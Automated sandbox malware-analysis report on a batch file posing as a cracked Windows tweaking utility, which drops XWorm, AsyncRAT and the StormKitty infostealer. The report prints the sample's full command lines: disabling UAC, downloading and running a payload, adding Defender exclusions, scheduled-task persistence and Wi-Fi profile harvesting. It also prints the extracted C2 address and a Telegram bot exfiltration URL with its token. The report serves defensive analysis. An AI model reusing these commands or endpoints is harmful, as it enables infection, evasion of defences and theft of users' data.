Resubmissions
30-05-2024 10:57
240530-m2a24sfg76 10Analysis
-
max time kernel
74s -
max time network
68s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
30-05-2024 10:57
Static task
static1
Behavioral task
behavioral1
Sample
EXM_Premium_Tweaking_Utility_1.0_Cracked.bat
Resource
win7-20240221-en
General
-
Target
EXM_Premium_Tweaking_Utility_1.0_Cracked.bat
-
Size
672KB
-
MD5
f9ca73d63fe61c4c401528fb470ce08e
-
SHA1
584f69b507ddf33985673ee612e6099aff760fb1
-
SHA256
16431cc14917abeb316e0bc44045440a8f86b7ac4fdd0dce99de6435d493ecca
-
SHA512
6fd03320ec84baf09a16a127c2c0ed3c265906fcb1a3b807c13001e775c396b66539238392438a8f290be04b8b8684050736331f8f99dbe8b868b44f154dd9de
-
SSDEEP
3072:BIGzQbmbkAqA2xH7VkKEn14IZVvisLur+K3:BIGiVNEn14IZVvisL43
Malware Config
Extracted
xworm
193.161.193.99:49836
-
Install_directory
%LocalAppData%
-
install_file
svchost.exe
-
telegram
https://api.telegram.org/bot6701075763:AAGkvv2CpqBxGihH8FtOkSA7Uxy35GZpAFI/sendMessage?chat_id=5991331733
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
https://api.telegram.org/bot6701075763:AAGkvv2CpqBxGihH8FtOkSA7Uxy35GZpAFI/sendMessage?chat_id=5991331733
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\ProgramData\svchost.exe family_xworm behavioral2/memory/4360-94-0x0000000000DE0000-0x0000000000DFC000-memory.dmp family_xworm -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
Processes:
resource yara_rule C:\ProgramData\runtimebroker.exe family_stormkitty behavioral2/memory/1940-98-0x0000000000E10000-0x0000000000E4E000-memory.dmp family_stormkitty -
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\ProgramData\runtimebroker.exe family_asyncrat -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 788 powershell.exe 3964 powershell.exe 3888 powershell.exe 3388 powershell.exe 4124 powershell.exe 3496 powershell.exe 2232 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
EXMservice.exesvchost.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation EXMservice.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation svchost.exe -
Executes dropped EXE 3 IoCs
Processes:
EXMservice.exesvchost.exeruntimebroker.exepid process 2476 EXMservice.exe 4360 svchost.exe 1940 runtimebroker.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
svchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\svchost.exe" svchost.exe -
Drops desktop.ini file(s) 8 IoCs
Processes:
runtimebroker.exedescription ioc process File created C:\Users\Admin\AppData\Local\970751ee820a3dac716af4d4e92a2496\Admin@LLXDHEWC_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini runtimebroker.exe File created C:\Users\Admin\AppData\Local\970751ee820a3dac716af4d4e92a2496\Admin@LLXDHEWC_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini runtimebroker.exe File created C:\Users\Admin\AppData\Local\970751ee820a3dac716af4d4e92a2496\Admin@LLXDHEWC_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini runtimebroker.exe File created C:\Users\Admin\AppData\Local\970751ee820a3dac716af4d4e92a2496\Admin@LLXDHEWC_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini runtimebroker.exe File created C:\Users\Admin\AppData\Local\970751ee820a3dac716af4d4e92a2496\Admin@LLXDHEWC_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini runtimebroker.exe File opened for modification C:\Users\Admin\AppData\Local\970751ee820a3dac716af4d4e92a2496\Admin@LLXDHEWC_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini runtimebroker.exe File created C:\Users\Admin\AppData\Local\970751ee820a3dac716af4d4e92a2496\Admin@LLXDHEWC_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini runtimebroker.exe File opened for modification C:\Users\Admin\AppData\Local\970751ee820a3dac716af4d4e92a2496\Admin@LLXDHEWC_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini runtimebroker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
runtimebroker.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 runtimebroker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier runtimebroker.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 42 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exeruntimebroker.exepowershell.exepid process 788 powershell.exe 788 powershell.exe 3964 powershell.exe 3964 powershell.exe 3388 powershell.exe 3388 powershell.exe 4124 powershell.exe 4124 powershell.exe 3496 powershell.exe 3496 powershell.exe 2232 powershell.exe 2232 powershell.exe 4360 svchost.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 1940 runtimebroker.exe 4360 svchost.exe 4360 svchost.exe 4360 svchost.exe 4360 svchost.exe 3888 powershell.exe 3888 powershell.exe -
Suspicious use of AdjustPrivilegeToken 52 IoCs
Processes:
powershell.exeWMIC.exepowershell.exesvchost.exeruntimebroker.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 788 powershell.exe Token: SeIncreaseQuotaPrivilege 2492 WMIC.exe Token: SeSecurityPrivilege 2492 WMIC.exe Token: SeTakeOwnershipPrivilege 2492 WMIC.exe Token: SeLoadDriverPrivilege 2492 WMIC.exe Token: SeSystemProfilePrivilege 2492 WMIC.exe Token: SeSystemtimePrivilege 2492 WMIC.exe Token: SeProfSingleProcessPrivilege 2492 WMIC.exe Token: SeIncBasePriorityPrivilege 2492 WMIC.exe Token: SeCreatePagefilePrivilege 2492 WMIC.exe Token: SeBackupPrivilege 2492 WMIC.exe Token: SeRestorePrivilege 2492 WMIC.exe Token: SeShutdownPrivilege 2492 WMIC.exe Token: SeDebugPrivilege 2492 WMIC.exe Token: SeSystemEnvironmentPrivilege 2492 WMIC.exe Token: SeRemoteShutdownPrivilege 2492 WMIC.exe Token: SeUndockPrivilege 2492 WMIC.exe Token: SeManageVolumePrivilege 2492 WMIC.exe Token: 33 2492 WMIC.exe Token: 34 2492 WMIC.exe Token: 35 2492 WMIC.exe Token: 36 2492 WMIC.exe Token: SeIncreaseQuotaPrivilege 2492 WMIC.exe Token: SeSecurityPrivilege 2492 WMIC.exe Token: SeTakeOwnershipPrivilege 2492 WMIC.exe Token: SeLoadDriverPrivilege 2492 WMIC.exe Token: SeSystemProfilePrivilege 2492 WMIC.exe Token: SeSystemtimePrivilege 2492 WMIC.exe Token: SeProfSingleProcessPrivilege 2492 WMIC.exe Token: SeIncBasePriorityPrivilege 2492 WMIC.exe Token: SeCreatePagefilePrivilege 2492 WMIC.exe Token: SeBackupPrivilege 2492 WMIC.exe Token: SeRestorePrivilege 2492 WMIC.exe Token: SeShutdownPrivilege 2492 WMIC.exe Token: SeDebugPrivilege 2492 WMIC.exe Token: SeSystemEnvironmentPrivilege 2492 WMIC.exe Token: SeRemoteShutdownPrivilege 2492 WMIC.exe Token: SeUndockPrivilege 2492 WMIC.exe Token: SeManageVolumePrivilege 2492 WMIC.exe Token: 33 2492 WMIC.exe Token: 34 2492 WMIC.exe Token: 35 2492 WMIC.exe Token: 36 2492 WMIC.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeDebugPrivilege 4360 svchost.exe Token: SeDebugPrivilege 1940 runtimebroker.exe Token: SeDebugPrivilege 3388 powershell.exe Token: SeDebugPrivilege 4124 powershell.exe Token: SeDebugPrivilege 3496 powershell.exe Token: SeDebugPrivilege 2232 powershell.exe Token: SeDebugPrivilege 4360 svchost.exe Token: SeDebugPrivilege 3888 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
svchost.exepid process 4360 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.exeEXMservice.exesvchost.exeruntimebroker.execmd.execmd.exedescription pid process target process PID 1288 wrote to memory of 3236 1288 cmd.exe reg.exe PID 1288 wrote to memory of 3236 1288 cmd.exe reg.exe PID 1288 wrote to memory of 936 1288 cmd.exe reg.exe PID 1288 wrote to memory of 936 1288 cmd.exe reg.exe PID 1288 wrote to memory of 1940 1288 cmd.exe reg.exe PID 1288 wrote to memory of 1940 1288 cmd.exe reg.exe PID 1288 wrote to memory of 788 1288 cmd.exe powershell.exe PID 1288 wrote to memory of 788 1288 cmd.exe powershell.exe PID 1288 wrote to memory of 1800 1288 cmd.exe reg.exe PID 1288 wrote to memory of 1800 1288 cmd.exe reg.exe PID 1288 wrote to memory of 3312 1288 cmd.exe reg.exe PID 1288 wrote to memory of 3312 1288 cmd.exe reg.exe PID 1288 wrote to memory of 3276 1288 cmd.exe cmd.exe PID 1288 wrote to memory of 3276 1288 cmd.exe cmd.exe PID 3276 wrote to memory of 2492 3276 cmd.exe WMIC.exe PID 3276 wrote to memory of 2492 3276 cmd.exe WMIC.exe PID 3276 wrote to memory of 5048 3276 cmd.exe findstr.exe PID 3276 wrote to memory of 5048 3276 cmd.exe findstr.exe PID 1288 wrote to memory of 3556 1288 cmd.exe chcp.com PID 1288 wrote to memory of 3556 1288 cmd.exe chcp.com PID 1288 wrote to memory of 4612 1288 cmd.exe chcp.com PID 1288 wrote to memory of 4612 1288 cmd.exe chcp.com PID 1288 wrote to memory of 2372 1288 cmd.exe curl.exe PID 1288 wrote to memory of 2372 1288 cmd.exe curl.exe PID 1288 wrote to memory of 3964 1288 cmd.exe powershell.exe PID 1288 wrote to memory of 3964 1288 cmd.exe powershell.exe PID 1288 wrote to memory of 2476 1288 cmd.exe EXMservice.exe PID 1288 wrote to memory of 2476 1288 cmd.exe EXMservice.exe PID 2476 wrote to memory of 4360 2476 EXMservice.exe svchost.exe PID 2476 wrote to memory of 4360 2476 EXMservice.exe svchost.exe PID 2476 wrote to memory of 1940 2476 EXMservice.exe runtimebroker.exe PID 2476 wrote to memory of 1940 2476 EXMservice.exe runtimebroker.exe PID 2476 wrote to memory of 1940 2476 EXMservice.exe runtimebroker.exe PID 1288 wrote to memory of 436 1288 cmd.exe chcp.com PID 1288 wrote to memory of 436 1288 cmd.exe chcp.com PID 4360 wrote to memory of 3388 4360 svchost.exe powershell.exe PID 4360 wrote to memory of 3388 4360 svchost.exe powershell.exe PID 4360 wrote to memory of 4124 4360 svchost.exe powershell.exe PID 4360 wrote to memory of 4124 4360 svchost.exe powershell.exe PID 4360 wrote to memory of 3496 4360 svchost.exe powershell.exe PID 4360 wrote to memory of 3496 4360 svchost.exe powershell.exe PID 4360 wrote to memory of 2232 4360 svchost.exe powershell.exe PID 4360 wrote to memory of 2232 4360 svchost.exe powershell.exe PID 4360 wrote to memory of 732 4360 svchost.exe schtasks.exe PID 4360 wrote to memory of 732 4360 svchost.exe schtasks.exe PID 1940 wrote to memory of 2476 1940 runtimebroker.exe cmd.exe PID 1940 wrote to memory of 2476 1940 runtimebroker.exe cmd.exe PID 1940 wrote to memory of 2476 1940 runtimebroker.exe cmd.exe PID 2476 wrote to memory of 4920 2476 cmd.exe chcp.com PID 2476 wrote to memory of 4920 2476 cmd.exe chcp.com PID 2476 wrote to memory of 4920 2476 cmd.exe chcp.com PID 2476 wrote to memory of 2844 2476 cmd.exe netsh.exe PID 2476 wrote to memory of 2844 2476 cmd.exe netsh.exe PID 2476 wrote to memory of 2844 2476 cmd.exe netsh.exe PID 2476 wrote to memory of 4532 2476 cmd.exe findstr.exe PID 2476 wrote to memory of 4532 2476 cmd.exe findstr.exe PID 2476 wrote to memory of 4532 2476 cmd.exe findstr.exe PID 1940 wrote to memory of 4780 1940 runtimebroker.exe cmd.exe PID 1940 wrote to memory of 4780 1940 runtimebroker.exe cmd.exe PID 1940 wrote to memory of 4780 1940 runtimebroker.exe cmd.exe PID 4780 wrote to memory of 4468 4780 cmd.exe chcp.com PID 4780 wrote to memory of 4468 4780 cmd.exe chcp.com PID 4780 wrote to memory of 4468 4780 cmd.exe chcp.com PID 4780 wrote to memory of 4928 4780 cmd.exe netsh.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\system32\reg.exeReg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f2⤵PID:3236
-
-
C:\Windows\system32\reg.exeReg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f2⤵PID:936
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f2⤵PID:1940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
C:\Windows\system32\reg.exeReg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f2⤵
- UAC bypass
PID:1800
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f2⤵PID:3312
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"2⤵
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_UserAccount where name="Admin" get sid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
-
C:\Windows\system32\findstr.exefindstr "S-"3⤵PID:5048
-
-
-
C:\Windows\system32\chcp.comchcp 650012⤵PID:3556
-
-
C:\Windows\system32\chcp.comchcp 4372⤵PID:4612
-
-
C:\Windows\system32\curl.execurl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"2⤵PID:2372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
C:\exm\EXMservice.exeEXMservice.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\ProgramData\svchost.exe"C:\ProgramData\svchost.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Local\svchost.exe"4⤵
- Creates scheduled task(s)
PID:732
-
-
-
C:\ProgramData\runtimebroker.exe"C:\ProgramData\runtimebroker.exe"3⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All4⤵
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵PID:4920
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile5⤵PID:2844
-
-
C:\Windows\SysWOW64\findstr.exefindstr All5⤵PID:4532
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid4⤵
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵PID:4468
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid5⤵PID:4928
-
-
-
-
-
C:\Windows\system32\chcp.comchcp 650012⤵PID:436
-
-
C:\Windows\system32\chcp.comchcp 4372⤵PID:4616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& {Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('ONLY DO THESE ON ETHERNET, WIFI TWEAKS COMING IN 1.0', 'Exm Tweaking Utility', 'Ok', [System.Windows.Forms.MessageBoxIcon]::Information);}"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3888
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
225KB
MD58008775094d446eaed43a423cd8a26f9
SHA14b8ef16e4a70fed23dc20cc5e27566df1e06af04
SHA25648a06f8dbe0c56894b38bb3489c8ed5243d246328c512ee265bc31de441b5e1f
SHA5126d9f2dca0d9032702971b339b7df65efab1c95d76e89044cf36ed43ef3116d21d1203d1561bd5fb4bd838d4df3dfbd240e2c89b715400f7a89037a3757326792
-
Filesize
88KB
MD5424bd17cfc4d1a3c274b5368d27b2b16
SHA1a3f372325ba20b7283cd243f3a1cb00c260fd779
SHA256317da7fba13d450ff8b7340fc45b026fe20d1ac5776852abbc196a70c4edf15a
SHA51242c448380d2c05b7230c245730913c735a8a0e067c2be8828f3a07799e75d4c4911258431bb05edf528944b983a62e3d75ce48c7813b926eb0a0641e586c97c4
-
C:\Users\Admin\AppData\Local\970751ee820a3dac716af4d4e92a2496\Admin@LLXDHEWC_en-US\System\Process.txt
Filesize4KB
MD558fb2a819ad9a6e3bc92ceb82f86c24c
SHA1723590ef6209ac1e61202c003bd2c5366f8bd7f9
SHA25655d008dd82fff26ff4cb151b0f2568f8a36e4ccd61b6e25453f6fe4998ca823b
SHA512a6d0ccf0c99529530ed6790f9c1f74de65e93c315ed1ddc38f50a69ab7eb45d2ce4d30cb8fa7831c0fce6320a09f6b0de4aab34d3a840df704df3f60f07d744a
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD52b8634a147a40bf4e6836be570a3e21d
SHA1a1f2eb05ade58e4aa48b156e5de8d72dc04c4ad3
SHA2562516904bf17e895f7b0c9bfec81fe1516de4d37c6a2835b8c83aa79f670f63ce
SHA51278c5348a121bc00e6f7427dc4b11c301c4f2e898c4108eb328c8a740d96fc8a8a1f869b3769e84ec1b36fc483280ae7b6d5e9981e7bf2facd548944b036a0bd8
-
Filesize
944B
MD58eb920ec36de874a0f1ba3c8b684ef1a
SHA1429a2245091d55268a611729193f6dbfedf3b7a7
SHA256670d7aaa9c419bf3ebfe19e7ff8fdf7f3c4fabf44be0c14ab296d20fc68e1948
SHA512b2ebc48f296d07b7d3baa7596ee24c94fcc8085bf7a9c0d9eb660648d0ffa46dea1c99f8597a405af130dfec05867eed22e9d300732fc47bfb73917f2e806608
-
Filesize
944B
MD554522d22658e4f8f87ecb947b71b8feb
SHA16a6144bdf9c445099f52211b6122a2ecf72b77e9
SHA256af18fc4864bc2982879aed928c960b6266f372c928f8c9632c5a4eecd64e448a
SHA51255f2c5a455be20dcb4cb93a29e5389e0422237bdd7ac40112fec6f16a36e5e19df50d25d39a6d5acb2d41a96514c7ecd8631ce8e67c4ff04997282f49d947aba
-
Filesize
944B
MD522310ad6749d8cc38284aa616efcd100
SHA1440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA25655b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA5122ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
944B
MD5e60eb305a7b2d9907488068b7065abd3
SHA11643dd7f915ac50c75bc01c53d68c5dafb9ce28d
SHA256ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135
SHA51295c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
17.6MB
MD56f327c93d2774f815fa2fbed9c6a833a
SHA134ccaf41e3b6790f1344060682eb406af6aec884
SHA256685c2177e06eb8fd5ac7e14794e3689c129cb643033452ef87d7549b96371d11
SHA512a42ed6efaf7205208d8efd4c01b55ac14025ea4f7d258e9a44c355c0cf975743a9c06637ea1eb2fe8b9d3e30527622a905bfeb700599c9885a1ebe0690aa35d7
-
Filesize
327KB
MD59afded50538d3ecced82517a6ad7b5f9
SHA1177d9e32159eef20f1264b3e9dc4f32ba8943b98
SHA256c9dd77e8faa24fb8ab7faf371fb23e286464b6d30cdee205524578bc88df3b20
SHA512acc3b5a5a20c1eabe0bc95c2199fd5e8681699db8c80942ffbdae9c887edab3e8ca9011c4736d50a8411d36227df38664e10c2b6e11a922bd24c2bbad596c49f